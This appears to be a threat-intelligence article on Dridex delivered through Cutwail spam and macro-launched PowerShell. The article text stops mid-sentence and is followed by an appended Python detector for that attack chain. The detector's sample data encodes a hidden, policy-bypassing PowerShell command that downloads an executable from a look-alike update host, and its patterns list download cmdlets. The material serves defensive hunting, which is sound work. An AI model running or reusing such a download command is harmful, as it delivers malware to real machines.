Dridex Campaign Propelled by Cutwail Botnet and Poisonous PowerShell Scripts

IBM X-Force threat intelligence has been observing a rise in Dridex-related network attacks that are being driven by the Cutwail botnet. Dridex is delivered as a second-stage infector after an initial document or spreadsheet arrives via email with booby-trapped macros. Recipients who activate the macros unknowingly launch malicious PowerShell scripts that will download additional malware. At this time, X-Force is seeing relatively limited campaigns active in Italy and Japan.


Invoke PowerShell, Download Dridex


The initial infection vector of the attacks we are observing is malspam email. Recipients receive unsolicited messages containing Microsoft Office file attachments, often delivered via the Cutwail botnet. Cutwail itself has been a prominent spamming infrastructure in the cybercrime arena, named as the largest of its kind in 2009, and continues to spread spam for elite malware-wielding gangs in 2021.


Overall, at least 34% of all PowerShell-based attacks X-Force has seen since June 2020 were ultimately linked with a Dridex payload. The PowerShell uptick became apparent in early 2020 and started rising more considerably in May 2020.


X-Force observed activity spikes in December 2020, which accounted for an 80% increase in the overall number of malicious PowerShell attacks compared to the preceding six-month period. In January 2021, X-Force observed a sudden decline in both PowerShell attacks and the embedded Dridex attacks, likely because the campaign ended and a new one started using a different macro variant and other scripts.


Figure 1: PowerShell network attacks per month (Source: IBM X-Force)


Multi-Stage Infections


In the cases X-Force analyzed, PowerShell is instructed to bypass the local execution policy and then runs a Base64-encoded command, which results in a request to what is meant to look like a Microsoft update URL. The script fetches a malicious executable file from that typo-squatted ..
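The chain described above (execution-policy bypass, a Base64-encoded command, a fetch from a look-alike update domain) is easy to triage from process-creation telemetry once the encoded argument is decoded, since PowerShell's -EncodedCommand is Base64 over UTF-16LE text. The following detector is an added example written for this article, not X-Force's tooling; the command lines it scans are constructed, the look-alike domain is a made-up .example host, and the allowlist of genuine update hosts is an assumption to be extended for your own estate.

```python
"""Triage PowerShell command lines for the Dridex-style chain:
execution-policy bypass + -EncodedCommand + download from a look-alike
"Microsoft update" host. Sample lines below are constructed for this example."""
import base64
import binascii
import re
from urllib.parse import urlparse

# Flags that disable the local execution policy (PowerShell accepts prefixes of the flag name).
EXEC_POLICY_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)\b", re.I)
# -EncodedCommand and its accepted abbreviations, followed by the Base64 blob.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Cmdlets and classes commonly used to fetch a file from a URL.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I,
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
# Assumption: illustrative allowlist of genuine Microsoft update domains; extend for your environment.
GENUINE_SUFFIXES = ("microsoft.com", "windowsupdate.com", "windows.com", "msft.net")
# Brand tokens whose presence in a non-allowlisted host suggests typo-squatting.
BRAND_TOKENS = ("microsoft", "windowsupdate", "msupdate", "ms-update")


def decode_encoded_command(blob: str):
    """Decode a -EncodedCommand argument; returns None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def is_lookalike_update_url(url: str) -> bool:
    """True when the host imitates a Microsoft update domain but is not on the allowlist."""
    host = (urlparse(url).hostname or "").lower()
    if any(host == s or host.endswith("." + s) for s in GENUINE_SUFFIXES):
        return False
    normalized = host.translate(str.maketrans("01", "ol"))  # crude homoglyph fold: 0->o, 1->l
    return any(tok in normalized for tok in BRAND_TOKENS)


def analyze(cmdline: str) -> dict:
    """Return the indicators found in one command line plus an overall verdict."""
    decoded = None
    m = ENCODED_RE.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
    # Inspect the decoded script together with the visible arguments.
    visible = cmdline + (" " + decoded if decoded else "")
    lookalikes = [u for u in URL_RE.findall(visible) if is_lookalike_update_url(u)]
    result = {
        "bypass_execution_policy": bool(EXEC_POLICY_RE.search(cmdline)),
        "encoded_command": decoded,
        "download_cradle": bool(DOWNLOAD_RE.search(visible)),
        "lookalike_urls": lookalikes,
    }
    # One indicator alone is common in legitimate administration; two or more
    # together reproduce the multi-stage pattern the article describes.
    score = sum([result["bypass_execution_policy"], decoded is not None,
                 result["download_cradle"], bool(lookalikes)])
    result["suspicious"] = score >= 2
    return result


def _encode(ps: str) -> str:
    """Build a Base64/UTF-16LE blob the way PowerShell expects (used only to construct the sample)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample process-creation command lines: two benign, one matching the chain.
SAMPLE_LINES = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1",
    "powershell.exe -w hidden -ep bypass -enc " + _encode(
        "Invoke-WebRequest 'http://update.micros0ft-update.example/ms-update.exe' -OutFile $env:TEMP\\msupd.exe"),
]


def triage(lines):
    """Analyze every line; returns a list of (cmdline, result) pairs."""
    return [(line, analyze(line)) for line in lines]


if __name__ == "__main__":
    for line, res in triage(SAMPLE_LINES):
        print("SUSPICIOUS" if res["suspicious"] else "ok       ", line[:70])
        if res["encoded_command"]:
            print("    decoded:", res["encoded_command"])
```

The verdict is a triage heuristic, not a signature: an administrator's scheduled task that combines -ep bypass with an encoded command will also score two, so the output belongs in an analyst queue rather than a blocking control. The useful part for hunting is the decoded script text and the extracted URLs, which can be pivoted against proxy logs for the same look-alike host.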
